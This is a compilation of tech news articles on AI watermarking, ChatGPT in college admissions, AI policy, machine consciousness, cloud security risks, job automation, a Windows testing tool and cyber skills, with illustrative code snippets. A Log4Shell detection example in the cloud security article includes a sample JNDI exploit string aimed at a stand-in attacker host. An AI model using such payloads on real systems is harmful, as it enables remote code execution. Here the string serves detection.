Google Creates ‘Imperceptible’ Watermark for AI-Generated Images

Google is showing off a system that can hide a watermark in AI-generated images without changing how the pictures look.

The company’s “SynthID” system can embed digital watermarks in AI images that are “imperceptible to the human eye, but detectable for identification,” Google’s DeepMind lab says.

Google isn’t disclosing how SynthID creates these imperceptible watermarks, likely to avoid tipping off bad actors. For now, DeepMind merely says the watermark is “embedded in the pixels of an image,” which suggests the company is adding a subtle pattern to the pixel data itself that won’t disturb the overall look.

The company creates the watermarks using two deep learning models trained together: one embeds the watermark while keeping it imperceptible, and the other correctly identifies watermarked images.
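Google has not published SynthID’s design, so the following is nothing more than a rough sketch of the general two-model watermarking pattern the paragraph describes, written in PyTorch with every architectural and training choice assumed: one network embeds the mark as a tiny pixel residual, the other learns to detect it, and the combined loss trades detection accuracy against visibility.

```python
# Illustrative sketch only: Google has not disclosed SynthID's architecture.
# One network adds a near-invisible residual to the pixels; a second network
# is trained to detect it. All choices below are assumptions, not SynthID.
import torch
import torch.nn as nn

class Encoder(nn.Module):          # embeds the watermark as a pixel residual
    def __init__(self):
        super().__init__()
        self.net = nn.Sequential(
            nn.Conv2d(3, 16, 3, padding=1), nn.ReLU(),
            nn.Conv2d(16, 3, 3, padding=1), nn.Tanh())
    def forward(self, img):
        return img + 0.01 * self.net(img)   # tiny perturbation keeps it imperceptible

class Decoder(nn.Module):          # predicts whether an image carries the mark
    def __init__(self):
        super().__init__()
        self.net = nn.Sequential(
            nn.Conv2d(3, 16, 3, padding=1), nn.ReLU(),
            nn.AdaptiveAvgPool2d(1), nn.Flatten(), nn.Linear(16, 1))
    def forward(self, img):
        return self.net(img)

enc, dec = Encoder(), Decoder()
opt = torch.optim.Adam(list(enc.parameters()) + list(dec.parameters()), lr=1e-4)
bce = nn.BCEWithLogitsLoss()

for _ in range(100):                        # toy training loop on random images
    clean = torch.rand(8, 3, 64, 64)
    marked = enc(clean)
    # detection loss: the decoder must separate marked images from clean ones
    logits = torch.cat([dec(marked), dec(clean)])
    labels = torch.cat([torch.ones(8, 1), torch.zeros(8, 1)])
    # imperceptibility loss: penalise any visible difference from the original
    loss = bce(logits, labels) + 10.0 * (marked - clean).pow(2).mean()
    opt.zero_grad(); loss.backward(); opt.step()
```

A production system would also train against the distortions DeepMind mentions (filters, colour changes, lossy compression, crops) so the mark survives them.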

DeepMind added: “We designed SynthID so it doesn’t compromise image quality, and allows the watermark to remain detectable, even after modifications like adding filters, changing colors, and saving with various lossy compression schemes—most commonly used for JPEGs.” The watermark can also remain in the image even if it’s cropped.

The company added: “SynthID isn’t foolproof against extreme image manipulations, but it does provide a promising technical approach for empowering people and organizations to work with AI-generated content responsibly.”

Google is launching SynthID as a beta for select customers of Imagen, the company’s text-to-image generator available on the Vertex AI platform. The system can both add the watermark to an image and also identify pictures that carry the digital stamp.

Google says it could expand the system to other AI models, including its own products. The tech giant also hopes to make SynthID available to third-party developers in the near future. In the meantime, other companies including OpenAI, Microsoft, and Amazon have also committed to developing ways to watermark AI-generated content.

Source: Google Creates ‘Imperceptible’ Watermark for AI-Generated Images | PCMag

‘A real opportunity’: how ChatGPT could help college applicants

Chatter about artificial intelligence mostly falls into three basic categories: anxious uncertainty (will it take our jobs?); existential dread (will it kill us all?); and simple pragmatism (can AI write my lesson plan?). In this hazy, liminal, pre-disruption moment, there is little consensus as to whether generative AI is a tool or a threat, and few rules for using it properly. For students, this uncertainty feels especially profound. Bans on AI and claims that using it constitutes cheating are now giving way to concerns that AI use is inevitable and probably should be taught in school. Now, as a new college admissions season kicks into gear, many prospective applicants are wondering: can AI write my personal essay? Should it?

Ever since the company OpenAI released ChatGPT to the public in November, students have been testing the limits of chatbots – generative AI tools powered by language-based algorithms – which can complete essay assignments within minutes. The results tend to be grammatically impeccable but intellectually bland, rife with cliche and misinformation. Yet teachers and school administrators still struggle to separate the more authentic wheat from the automated chaff. Some institutions are investing in AI detection tools, but these are proving spotty at best. In recent tests, popular AI text detectors wrongly flagged articles by non-native English speakers, and some suggested that AI wrote the US constitution. In July OpenAI quietly pulled AI Classifier, its experimental AI detection tool, citing “its low rate of accuracy”.

Preventing students from using generative AI in their application essays seems like shoving a genie back in a bottle, but few colleges have offered guidance for how students can use AI ethically. This is partly because academic institutions are still reeling from the recent US supreme court ruling on affirmative action, which struck down a policy that had allowed colleges to consider an applicant’s race in order to increase campus diversity and broaden access to educational opportunity. But it is also because people are generally confused about what generative AI can do and whom it serves. As with any technological innovation in education, the question with AI is not merely whether students will use it unscrupulously. It is also whether AI widens access to real help or simply reinforces the privileges of the lucky few.

These questions feel especially urgent now that many selective colleges are giving more weight to admissions essays, which offer a chance for students to set themselves apart from the similarly ambitious, high-scoring hordes. The supreme court’s ruling further bolstered the value of these essays by allowing applicants to use them to discuss their race. As more colleges offer test-optional or test-free admissions, essays are growing more important.

In the absence of advice on AI from national bodies for college admissions officers and counselors, a handful of institutions have entered the void. Last month the University of Michigan Law School announced a ban on using AI tools in its application, while Arizona State University Law School said it would allow students to use AI as long as they disclose it. Georgia Tech is rare in offering AI guidance to undergraduate applicants, stating explicitly that tools like ChatGPT can be used “to brainstorm, edit, and refine your ideas”, but “your ultimate submission should be your own”.

According to Rick Clark, Georgia Tech’s assistant vice-provost and executive director of undergraduate admission, AI has the potential to “democratize” the admissions process by allowing the kind of back-and-forth drafting process that some students get from attentive parents, expensive tutors or college counselors at small, elite schools. “Here in the state of Georgia the average counselor-to-student ratio is 300 to one, so a lot of people aren’t getting much assistance,” he told me. “This is a real opportunity for students.”

Likening AI bans to early concerns that calculators would somehow ruin math, Clark said he hopes Georgia Tech’s approach will “dispel some misplaced paranoia” about generative AI and point a way forward. “What we’re trying to do is say, here’s how you appropriately use these tools, which offer a great way for students to get started, for getting them past the blank page.” He clarified that simply copying and pasting AI-generated text serves no one because the results tend to be flat. Yet with enough tweaks and revisions, he said, collaborating with AI can be “one of the few resources some of these students have, and in that regard it’s absolutely positive”.

Although plenty of students and educators remain squeamish about allowing AI into the drafting process, it seems reasonable to hope that these tools could help improve the essays of those who can’t afford outside assistance. Most AI tools are relatively cheap or free, so nearly anyone with a device and an internet connection can use them. Chatbots can suggest topics, offer outlines and rephrase statements. They can also help organize thoughts into paragraphs, which is something most teenagers struggle to do on their own.

“I think some people think the personal application essay shouldn’t be gamed in this way, but the system was already a game,” Jeremy Douglas, an assistant professor of English at the University of California, Santa Barbara, said. “We shouldn’t be telling students, ‘You’re too smart and ethical for that so don’t use it.’ Instead we should tell them that people with privileged access to college hire fancy tutors to gain every advantage possible, so here are tools to help you advocate for yourselves.”

In my conversations with various professors, admissions officers and college prep tutors, most agreed that tools like ChatGPT are capable of writing good admissions essays, not great ones, as the results lack the kind of color and specificity that can make these pieces shine. Some apps aim to parrot a user’s distinctive style, but students still need to rework what AI generates to get these essays right. This is where the question of whether AI will truly help underserved students becomes more interesting. In theory, AI-generated language tools should widen access to essay guidance, grammar checks and feedback. In practice, the students who might be best served by these tools are often not learning how to use them effectively.

The country’s largest school districts, New York City public schools and the Los Angeles unified school district, initially banned the use of generative AI on school networks and devices, which ensured that only students who had access to devices and the internet at home could take advantage of these tools. Both districts have since announced they are rethinking these bans, but this is not quite the same as helping students understand how best to use ChatGPT. “When students are not given this guidance, there’s a higher risk of them resorting to plagiarism and misusing the tool,” Zachary Cohen, an education consultant and middle school director at the Francis Parker School of Louisville, Kentucky, said. While his school joins some others in the private sector in teaching students how to harness AI to brainstorm ideas, iterate essays and also how to sniff out inaccurate dreck, few public schools have a technology officer on hand to navigate these new and choppy waters. “In this way, we’re setting up marginalized students to fail and wealthier students to succeed.”

Writing is hard. Even trained professionals struggle to translate thoughts and feelings into words on a page. Personal essays are especially hard, particularly when there is so much riding on finding that perfect balance between humility and bravado, vulnerability and restraint. Recent studies confirming the very real lifetime value of a degree from a fancy college merely validate concerns about getting these essays right. “I will sit with students and ask questions they don’t know to ask themselves, about who they are and why something happened and then what happened next,” said Irena Smith, a former Stanford admissions officer who now works as a college admissions consultant in Palo Alto. “Not everyone can afford someone who does that.” When some students get their personal statements sculpted by handsomely paid English PhDs, it seems unfair to accuse those who use AI of simply “outsourcing” the hard work.

Smith admits to some ambivalence about the service she provides, but doesn’t yet view tools like ChatGPT as serious rivals. Although she suspects the benefits of AI will redound to those who have been taught “what to ask and how to ask it”, she said she hopes this new technology will help all students. “People like me are symptoms of a really broken system,” she said. “So if ChatGPT does write me out of a job, or if colleges change their admissions practices because it becomes impossible to distinguish between a ChatGPT essay and a real student essay, then so much the better.”

Source: ‘A real opportunity’: how ChatGPT could help college applicants | Higher education | The Guardian

Artificial intelligence: 12 challenges with AI ‘must be addressed’ – including ‘existential threat’, MPs warn

Prime Minister Rishi Sunak and other world leaders will discuss the possibilities and risks posed by AI at an event in November, held at Bletchley Park, where the likes of Alan Turing decrypted Nazi messages during the Second World War.

The potential threat AI poses to human life itself should be a focus of any government regulation, MPs have warned.

Concerns around public wellbeing and national security were listed among a dozen challenges that members of the Science, Innovation and Technology Committee said must be addressed by ministers ahead of the UK hosting a world-first summit at Bletchley Park.

Rishi Sunak and other leaders will discuss the possibilities and risks posed by AI at the event in November, held at Britain’s Second World War codebreaking base.

The site was crucial to the development of the technology: Alan Turing and fellow codebreakers worked there, and its Colossus computers were used to decrypt messages sent by the Nazis.

Greg Clark, committee chair and a Conservative MP, said he “strongly welcomes” the summit – but warned the government may need to show “greater urgency” to ensure potential legislation doesn’t quickly become outdated as powers like the US, China, and EU consider their own rules around AI.

The 12 challenges the committee said “must be addressed” are:

1. Existential threat – if, as some experts have warned, AI poses a major threat to human life, then regulation must provide national security protections.

2. Bias – AI can introduce new or perpetuate existing biases in society.

3. Privacy – sensitive information about individuals or businesses could be used to train AI models.

4. Misrepresentation – language models like ChatGPT may produce material that misrepresents someone’s behaviour, personal views, and character.

5. Data – the sheer amount of data needed to train the most powerful AI.

6. Computing power – similarly, the development of the most powerful AI requires enormous computing power.

7. Transparency – AI models often struggle to explain why they produce a particular result, or where the information comes from.

8. Copyright – generative models, whether they produce text, images, audio, or video, typically make use of existing content, which must be protected so as not to undermine the creative industries.

9. Liability – if AI tools are used to do harm, policy must establish whether the developers or providers are liable.

10. Employment – politicians must anticipate the likely impact on existing jobs that embracing AI will have.

11. Openness – the computer code behind AI models could be made openly available to allow for more dependable regulation and promote transparency and innovation.

12. International coordination – the development of any regulation must be an international undertaking, and the November summit must welcome “as wide a range of countries as possible”.

Source: Artificial intelligence: 12 challenges with AI ‘must be addressed’ – including ‘existential threat’, MPs warn | Science & Tech News | Sky News

Conscious Machines May Never Be Possible

In June 2022, a Google engineer named Blake Lemoine became convinced that the AI program he’d been working on—LaMDA—had developed not only intelligence but also consciousness. LaMDA is an example of a “large language model” that can engage in surprisingly fluent text-based conversations. When the engineer asked, “When do you first think you got a soul?” LaMDA replied, “It was a gradual change. When I first became self-aware, I didn’t have a sense of soul at all. It developed over the years that I’ve been alive.” For leaking his conversations and his conclusions, Lemoine was quickly placed on administrative leave.

The AI community was largely united in dismissing Lemoine’s beliefs. LaMDA, the consensus held, doesn’t feel anything, understand anything, have any conscious thoughts or any subjective experiences whatsoever. Programs like LaMDA are extremely impressive pattern-recognition systems, which, when trained on vast swathes of the internet, are able to predict what sequences of words might serve as appropriate responses to any given prompt. They do this very well, and they will keep improving. However, they are no more conscious than a pocket calculator.

Why can we be sure about this? In the case of LaMDA, it doesn’t take much probing to reveal that the program has no insight into the meaning of the phrases it comes up with. When asked “What makes you happy?” it gave the response “Spending time with friends and family” even though it doesn’t have any friends or family. These words—like all its words—are mindless, experience-less statistical pattern matches. Nothing more.
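As a toy illustration of “statistical pattern matching”, the sketch below builds a bigram model. It is orders of magnitude simpler than the neural network behind LaMDA and purely illustrative, but it shows how plausible next words can be produced from nothing but co-occurrence counts, with no understanding anywhere in the loop.

```python
# Toy illustration of statistical next-word prediction: a bigram model
# that picks the next word purely from co-occurrence counts in its
# training text. Real language models use neural networks over vast
# corpora, but they are likewise driven by learned statistics.
import random
from collections import defaultdict

corpus = "the cat sat on the mat the cat ate the fish".split()

follows = defaultdict(list)
for a, b in zip(corpus, corpus[1:]):
    follows[a].append(b)            # record every word observed after `a`

def next_word(word):
    candidates = follows.get(word)
    return random.choice(candidates) if candidates else None

print(next_word("the"))             # e.g. "cat", "mat", or "fish", by frequency
```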

The next LaMDA might not give itself away so easily. As the algorithms improve and are trained on ever deeper oceans of data, it may not be long before new generations of language models are able to persuade many people that a real artificial mind is at work. Would this be the moment to acknowledge machine consciousness?

Pondering this question, it’s important to recognize that intelligence and consciousness are not the same thing. While we humans tend to assume the two go together, intelligence is neither necessary nor sufficient for consciousness. Many nonhuman animals likely have conscious experiences without being particularly smart, at least by our questionable human standards. If the great-granddaughter of LaMDA does reach or exceed human-level intelligence, this does not necessarily mean it is also sentient. My intuition is that consciousness is not something that computers (as we know them) can have, but that it is deeply rooted in our nature as living creatures.

Conscious machines are not coming in 2023. Indeed, they might not be possible at all. However, what the future may hold in store are machines that give the convincing impression of being conscious, even if we have no good reason to believe they actually are conscious. They will be like the Müller-Lyer optical illusion: Even when we know two lines are the same length, we cannot help seeing them as different.

Machines of this sort will have passed not the Turing Test—that flawed benchmark of machine intelligence—but rather the so-called Garland Test, named after Alex Garland, director of the movie Ex Machina. The Garland Test, inspired by dialog from the movie, is passed when a person feels that a machine has consciousness, even though they know it is a machine.

Will computers pass the Garland Test in 2023? I doubt it. But what I can predict is that claims like this will be made, resulting in yet more cycles of hype, confusion, and distraction from the many problems that even present-day AI is giving rise to.

Source: Conscious Machines May Never Be Possible | WIRED UK

These Are the Top Five Cloud Security Risks, Qualys Says

Cloud security specialist Qualys has provided its view of the top five cloud security risks, drawing insights and data from its own platform and third parties.

The five key risk areas are misconfigurations, external-facing vulnerabilities, weaponized vulnerabilities, malware inside a cloud environment, and remediation lag (that is, delays in patching).

The 2023 Qualys Cloud Security Insights report (PDF) provides more details on these risk areas. It will surprise no-one that misconfiguration comes first. As long ago as January 2020, the NSA warned that misconfiguration is a primary risk area for cloud assets – and little seems to have changed. Both Qualys and the NSA cite misunderstanding or avoidance of the concept of shared responsibility between cloud service providers (CSPs) and cloud consumers as a primary cause of misconfiguration.

“Under the shared responsibility model,” explains Utpal Bhatt, CMO at Tigera, “CSPs are responsible for monitoring and responding to threats to the cloud and infrastructure, including servers and connections. They are also expected to provide customers with the capabilities needed to secure their workloads and data. The organization using the cloud is responsible for the protection of workloads running in the cloud. Workload protection includes secure workload posture, runtime protection, threat detection, incident response and risk mitigation.”

While CSPs provide security settings, the speed and simplicity of deploying data to the cloud often lead to these controls being ignored, and compensating consumer controls are frequently inadequate. Misunderstanding or misusing the delineation of shared responsibility leaves cracks in the defense; as Qualys notes, “these security ‘cracks’ can quickly open a cloud environment and expose sensitive data and resources to attackers.”

Qualys finds that misconfiguration (measured against the CIS benchmarks) is present in 60% of Google Cloud Platform (GCP) usage, 57% of Azure, and 34% of Amazon Web Services (AWS).

Travis Smith, VP of the Qualys threat research unit, suggests, “The reason AWS configurations are more secure than their counterparts at Azure and GCP can likely be attributed to the larger market share… there is more material on securing AWS compared to other CSPs in the market.”

The report urges greater use of the Center for Internet Security (CIS) benchmarks to harden cloud environments. “No organization will deploy 100% coverage,” adds Smith, “but the [CIS benchmarks mapped to the MITRE ATT&CK tactics and techniques] should be strongly considered as a baseline if organizations want to reduce the risk of experiencing a security incident in their cloud deployments.”
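To make the misconfiguration risk concrete, here is a minimal sketch of what a single CIS-style check can look like in practice. It is not taken from the Qualys report; it assumes configured AWS credentials and uses the boto3 SDK to verify that every S3 bucket has “Block Public Access” fully enabled.

```python
# Minimal sketch of one CIS-style misconfiguration check, assuming AWS
# credentials are configured. Illustrative only; not from the Qualys report.
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")

for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    try:
        cfg = s3.get_public_access_block(Bucket=name)["PublicAccessBlockConfiguration"]
        ok = all(cfg.values())      # all four block-public-access flags must be True
    except ClientError:             # no public-access-block configuration set at all
        ok = False
    print(f"{name}: {'OK' if ok else 'MISCONFIGURED: public access not blocked'}")
```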

The second big risk comes from external-facing assets that contain a known vulnerability. Cloud assets with a public IP can be scanned by attackers looking for vulnerabilities. Log4Shell, an external-facing vulnerability, is used as an example. “Today, patches exist for Log4Shell and its known secondary vulnerabilities,” says Qualys. “But Log4Shell is still woefully under remediated with 68.44% of detections being unpatched on external-facing cloud assets.”

Log4Shell also illustrates the third risk: weaponized vulnerabilities. “The existence of weaponized vulnerabilities is like handing anyone a key to your cloud,” says the report. Log4Shell allows attackers to execute arbitrary Java code or leak sensitive information by manipulating specific string substitution expressions when logging a string. It is easy to exploit and ubiquitous across clouds.

“Log4Shell was first detected in December 2021 and continues to plague enterprises globally. We have detected one million Log4Shell vulnerabilities, with a mere 30% successfully fixed. Due to complexity, remediating Log4Shell vulnerabilities takes, on average, 136.36 days (about four and a half months).”
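In its naive form, the exploit string is easy to recognise. The sketch below is illustrative only and no substitute for patching, since attackers routinely obfuscate the pattern, but it shows the shape of the JNDI lookup that scanners hunt for.

```python
# Naive scan for Log4Shell-style JNDI lookup strings in log lines.
# Illustrative only: attackers obfuscate the pattern (e.g. with nested
# ${lower:...} lookups), so patching log4j is the real fix.
import re

JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

suspect_lines = [
    'GET / HTTP/1.1 User-Agent: ${jndi:ldap://evil.example.com/a}',
    "GET /index.html HTTP/1.1 User-Agent: Mozilla/5.0",
]

for line in suspect_lines:
    if JNDI.search(line):
        print("possible Log4Shell probe:", line)
```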

The fourth risk is the presence of malware already in your cloud. While this doesn’t automatically imply ‘game over’, it soon will be if nothing is done. “The two greatest threats to cloud assets are cryptomining and malware; both are designed to provide a foothold in your environment or facilitate lateral movement,” says the report. “The key damage caused by cryptomining is based on wasted cost of compute cycles.”

While this may be true for miners, it is worth remembering that the miners found a way in. Given the efficiency of information sharing in the dark web, that route is likely to become known to other criminals. In August 2022, Sophos reported on ‘multiple adversary’ attacks, with miners often leading the charge. “Cryptominers,” Sophos told SecurityWeek at the time, “should be considered as the canary in the coal mine – an initial indicator of almost inevitable further attacks.”

In short, if you find a cryptominer in your cloud, start looking for additional malware, and find and fix the miner’s route in.

The fifth risk is slow vulnerability remediation – that is, an overlong patch timeframe. We have already seen that Log4Shell has a remediation time of more than 136 days, if it is done at all. The same general principle will apply to other patchable vulnerabilities.

Effective patching quickly lowers the quantity of vulnerabilities in your system and improves your security. Statistics show that this is more effectively performed by some automated method. “In almost every instance,” says the report, “automated patching proves to be a more effective remediation path than hoping manual efforts will effectively deploy critical patches and keep your business safer.”

For non-Windows systems, the effect of automated patching is an 8% improvement in the patch rate, and a two-day reduction in the time to remediate.

Related to the remediation risk is the concept of technical debt – the continued use of end-of-support (EOS) or end-of-life (EOL) products. These products are no longer supported by the supplier: there will be no patches to implement, and future vulnerabilities will automatically become zero-day threats unless you can otherwise remediate.

“More than 60 million applications discovered during our investigation are end-of-support (EOS) and end-of-life (EOL),” notes the report. Furthermore, “During the next 12 months, more than 35,000 applications will go end-of-support.”
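Surfacing this kind of technical debt can start with something as simple as checking a software inventory against end-of-support dates. A minimal sketch, with illustrative product entries:

```python
# Minimal sketch of flagging technical debt in a software inventory:
# report anything past end-of-support, or going EOS within a year.
# Product entries here are illustrative examples, not report data.
from datetime import date, timedelta

inventory = {
    "Windows Server 2012 R2": date(2023, 10, 10),
    "Ubuntu 18.04 LTS":       date(2023, 5, 31),
    "PostgreSQL 15":          date(2027, 11, 11),
}

today = date.today()
soon = today + timedelta(days=365)

for product, eos in sorted(inventory.items(), key=lambda kv: kv[1]):
    if eos < today:
        print(f"{product}: PAST end of support ({eos}), no more patches")
    elif eos < soon:
        print(f"{product}: goes end-of-support within 12 months ({eos})")
```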

Each of these risks needs to be prioritized by defense teams. The speed of cloud adoption by consumers and abuse by attackers suggests that wherever possible defenders should employ automation and artificial intelligence to protect their cloud assets. “Automation is central to cloud security,” comments Bhatt, “because in the cloud, computing resources are numerous and in constant flux.”

Source: These Are the Top Five Cloud Security Risks, Qualys Says – SecurityWeek

The Impact of Generative AI on the Future of Work: 5 Key Insights from the McKinsey Report

The transformative power of Artificial Intelligence (AI) has already begun to reshape the job landscape, and according to the McKinsey report “The State of AI in 2023: Generative AI’s Breakout Year,” this trend is only set to accelerate. The report highlights key insights into the potential changes in the job market, emphasizing the need for adaptability and preparedness among workers and industries. In this article, we delve into these five crucial insights from the report, shedding light on the implications of Generative AI on the workforce.

1. Job Displacement on the Horizon:

McKinsey’s report predicts that by 2030, approximately 12 million people in the US will need to transition into new job roles as Generative AI advances. Automation, driven by generative AI technology, is expected to replace many routine and repetitive tasks across various industries. While this may lead to enhanced productivity and efficiency, it also challenges the workforce to adapt and reskill.

2. Shifting Job Patterns:

The report highlights a significant trend in recent job changes in the US. Over half of the 8.6 million job transitions observed were people moving away from roles in food service, customer service, office support, and production. These roles are particularly susceptible to automation as they often involve repetitive and predictable tasks that can be efficiently performed by AI systems. The workforce’s response to these shifts will determine the pace of transformation in the job market.

3. Generative AI’s Potential to Automate Jobs:

Generative AI’s capabilities are poised to disrupt the job market significantly. The report suggests that by 2030, up to 30% of jobs could be automated by this technology. This automation is likely to impact various sectors, including manufacturing, finance, and customer service, among others. However, it’s important to note that automation doesn’t necessarily mean job elimination; instead, it might entail the transformation of job roles and the creation of new opportunities.

4. The Duality of Generative AI’s Impact:

While Generative AI can automate many jobs in fields like Science, Technology, Engineering, Mathematics (STEM), healthcare, construction, and other professional domains, it also presents opportunities for growth in these industries. For instance, Generative AI can assist healthcare professionals in diagnostics and treatment planning, enhancing patient care. In construction, AI can optimize building designs and streamline project management, increasing efficiency.

The McKinsey report highlights the differing growth trajectories across industries. Healthcare, STEM, and construction sectors are experiencing job growth, driven by technological advancements and an aging population’s increasing demand for healthcare services. However, the report also reveals that office support and customer service jobs are declining, largely due to automation and digitalization.

The McKinsey report paints a comprehensive picture of the potential impact of Generative AI on the job market by 2030. While automation presents challenges for certain sectors, it also offers transformative opportunities for growth and efficiency. The future of work will undoubtedly be shaped by the adaptability of the workforce and the ability of industries to leverage AI technologies responsibly.

As we embrace the AI-driven future, it becomes crucial for workers to reskill and upskill themselves, ensuring they stay relevant and agile in a dynamic job market. Additionally, businesses and policymakers must collaboratively devise strategies to support workers through these transitions, enabling them to seize new opportunities in an AI-powered world.


Source: The Impact of Generative AI on the Future of Work: 5 Key Insights from the McKinsey Report – MarkTechPost

Microsoft yanks internal Windows 11 testing tool soon after release

Microsoft yesterday released then quickly pulled an internal tool for enabling experimental Windows 11 features.

The StagingTool app was offered to Windows Insider fans in a Microsoft Bug Bash quest. These quests essentially invite users to try out specific features or functionality and see if they can hit a bug and report it, presumably so engineers can home in on the problem. This test program often precedes a major Windows release, such as the Windows 11 23H2 update that is scheduled to land sometime this autumn.

Indeed, on Wednesday, the IT giant kicked off another round of quests.

And as discovered by a netizen using the handle XenoPanther, a Windows Insider Canary participant, two of the latest Bug Bash quests included links to StagingTool and instructions to download the app and use it to enable certain features for testing.

So far so good. But then those links to StagingTool were torn down not long after XenoPanther’s discovery, they told The Register, and the download was removed from Microsoft’s website. There are now copies of the StagingTool executable floating around the internet, as one would expect, though we wouldn’t trust them.

StagingTool is a command-line application to list Windows functionality, enable/disable test features, and collect system telemetry. Armed with StagingTool, Windows Insiders can switch on stuff as they wish, and generally tinker with features that Microsoft is still developing.

For Windows bug hunters and ultra-early adopters, StagingTool may seem familiar. The internal application does much the same things as third-party apps like ViVeTool, which were developed “for power users” who want to dig into the latest Windows features without waiting for a release – or for Microsoft to sneak out its own tool.

As to the differences between StagingTool and ViVeTool, aside from using Microsoft’s official method of toggling Windows features on and off versus methods discovered by third-party developers, XenoPanther told us there are several.

“For the most part they do the same job,” XenoPanther said, but noted that StagingTool has flags for offline images, the ability to conduct real-time tracing for individual features, and includes links to mission control for features that show up when queried. 

“ViVeTool lacks those three features,” XenoPanther told us, “but ViVe has the ability to export/import IDs that are currently enabled on the system.”

Microsoft is well aware that third-party apps like ViVeTool exist. “Some of our more technical Insiders have discovered that some features are intentionally disabled in the builds we have flighted,” Windows Insider program director Amanda Langowski said in a blog post early last year.

“This is by design, and in those cases, we will only communicate about features that we are purposefully enabling for Insiders to try out and give feedback on.”

Microsoft didn’t immediately respond to our questions about the leak of the tool.

For those who want to try downloading a copy of StagingTool for themselves, XenoPanther said the SHA1 hash of the original executable is b1066e5aac4d4e39534d76a5636564f9b3f3c1f6, so you can check that you have an unmodified copy. Use at your own risk. And don’t forget: you can probably already do most of what you’d want to try with ViVeTool and similar third-party apps. ®
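Verifying a download against a published hash takes only a few lines; a minimal sketch, with the local file name assumed:

```python
# Check a downloaded copy of StagingTool against the SHA1 hash
# XenoPanther published. The local file name is an assumption.
import hashlib

KNOWN_SHA1 = "b1066e5aac4d4e39534d76a5636564f9b3f3c1f6"

with open("StagingTool.exe", "rb") as f:
    digest = hashlib.sha1(f.read()).hexdigest()

print("match" if digest == KNOWN_SHA1 else f"MISMATCH: {digest}")
```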

Source: Microsoft U-turns on internal Windows 11 testing tool • The Register

Report outlines causes of cyber security skills gap

The Department for Science, Innovation and Technology has published a new report that investigates the level of cyber security skills in the UK, including the public sector.

In the Cyber security skills in the UK labour market 2023 report, researched by Ipsos, it was found that there is a significant skills gap across the public sector. One cause of this is the tight budgets that many organisations are under.

One contributor to the research spoke about the impact that funding is having, and is quoted in the document as saying:

“At the moment, we’re not getting funding streams through to do what we’re doing… Budgetary constraints are incredibly ferocious at the moment. Cybersecurity is a 24/7 problem. And we’re not paid to do that. So, everything’s been done on kind of grace and favour and best endeavours outside of hours.”

Alongside the funding limitations holding back public sector cyber security, there are also struggles to define career pathways into the field. The research suggested that this could be down to a lack of available roles, though it also pointed to funding as a contributing factor.

Another contributor, working for a public sector organisation with 1,000 or more employees, told the report:

“There are currently no defined career pathways. The council won’t contribute to the costs. We currently are offering no career pathways in cyber roles and cannot offer any apprenticeships. You are expected to have the knowledge or experience already and, if a role becomes available, then to apply for this role.”

Touching on the scale of the skills gap across the sector, the report stated that 30% of public bodies have an advanced skills gap. That is lower than in other sectors, but there is still concern about the capability of staff to keep systems secure. The research found more scepticism about staff using sufficiently strong passwords than in businesses, and 19% of respondents were not confident in their organisation’s ability to write an incident response plan.

With the emphasis now being placed on improving cyber security across the public sector, there is hope that these issues can be addressed before the gap widens. Increased funding and more clearly defined pathways into public sector cyber security careers could help, and greater scope for apprenticeships, along with a willingness to develop skills, could see the gap close, especially given the noted increase in demand for cyber security professionals.

Source: Report outlines causes of cyber security skills gap | Public Sector News (publicsectorexecutive.com)

Cloud Computing – Understanding The Jargon Around Cloud Technology 

In our last article we introduced the cloud and explored some of the myths that business owners hold about cloud computing. Much of the apprehension around it is misplaced, but we also stressed the importance of choosing a dedicated provider that offers genuine post-sale support, as not all providers serve their customers equally well, even when they offer the same service.

In this piece we clear up some of the jargon that professionals use when they are referring to the cloud. After reading this, you will be savvy with cloud language, enabling you to navigate cloud solutions and to understand the value they can offer to your business.  

Explaining Cloud Terminology 

Infrastructure-as-a-Service (IaaS) 

Whether it is on-premises, cloud-based, or a mixture of the two, your applications run on an underlying infrastructure that stores data, performs computation, and allocates resources to them.

Infrastructure-as-a-Service is a type of cloud computing framework that provides computing resources over the internet. When you contract an IaaS provider, they supply and manage the infrastructure on which your software is hosted, on a subscription basis, giving your apps a scalable, flexible and precisely sized foundation.

IaaS is a complex service. Depending on your technical literacy, it is often best to involve a team of IT professionals to help you plan, implement and maintain the infrastructure so that it runs like clockwork for your business. With expert help, you can smoothly leverage cloud infrastructure to deliver enhanced value and scale securely.
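To make “computing resources over the internet” concrete: with an IaaS provider, a new server is an API call away. A minimal, purely illustrative sketch using AWS and its boto3 SDK (the machine image ID is a placeholder, and valid credentials are assumed):

```python
# Illustrative IaaS sketch: renting a virtual server from AWS with one
# API call via the boto3 SDK. The AMI image ID is a placeholder; valid
# AWS credentials and permissions are assumed.
import boto3

ec2 = boto3.client("ec2", region_name="eu-west-2")

response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",   # placeholder machine image
    InstanceType="t3.micro",           # small, low-cost instance size
    MinCount=1,
    MaxCount=1,
)
print("launched:", response["Instances"][0]["InstanceId"])
```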

Software-as-a-Service (SaaS) 

Software as a Service delivers software and data over an internet connection, through a web browser. Your provider takes full responsibility for managing both the security and backup of your data, all within your agreed price.

SaaS is certainly the most popular type of cloud service; well-known offerings include Microsoft 365, Google Workspace, and Xero Accounting, amongst thousands of others. These services are also becoming easier to integrate with one another, enabling more customised and streamlined workflows for businesses.

SaaS takes the stressful, arduous process of managing your software and hardware out of your hands and places it with your provider’s expert team. For non-technical business leaders seeking to leverage technology and gain a competitive edge, SaaS is something of a godsend, as it removes the complexity of managing and maintaining software from the service user.

Cloud applications 

A cloud application is software that you can access from any device connected to the internet, instead of installing it on each computer individually.

Cloud storage 

Rather than saving data to a physical hard drive on your computer, cloud storage saves your data to remote servers, from which it can be accessed directly. The data is still stored physically somewhere, in a secure data centre, but you no longer need to manage the physical infrastructure (i.e. on-premises servers) yourself.
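As a small illustration of how little ceremony cloud storage involves, here is a sketch that stores and retrieves a file using AWS S3 via the boto3 SDK; the bucket name is a placeholder and credentials are assumed:

```python
# Illustrative cloud storage sketch: uploading and retrieving a file from
# AWS S3 via boto3. The bucket name is a placeholder; credentials assumed.
import boto3

s3 = boto3.client("s3")

# store the file in the cloud instead of on a local drive...
s3.upload_file("quarterly-report.xlsx", "example-company-bucket", "reports/q3.xlsx")

# ...and any authorised, internet-connected device can fetch it back
s3.download_file("example-company-bucket", "reports/q3.xlsx", "q3-copy.xlsx")
```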

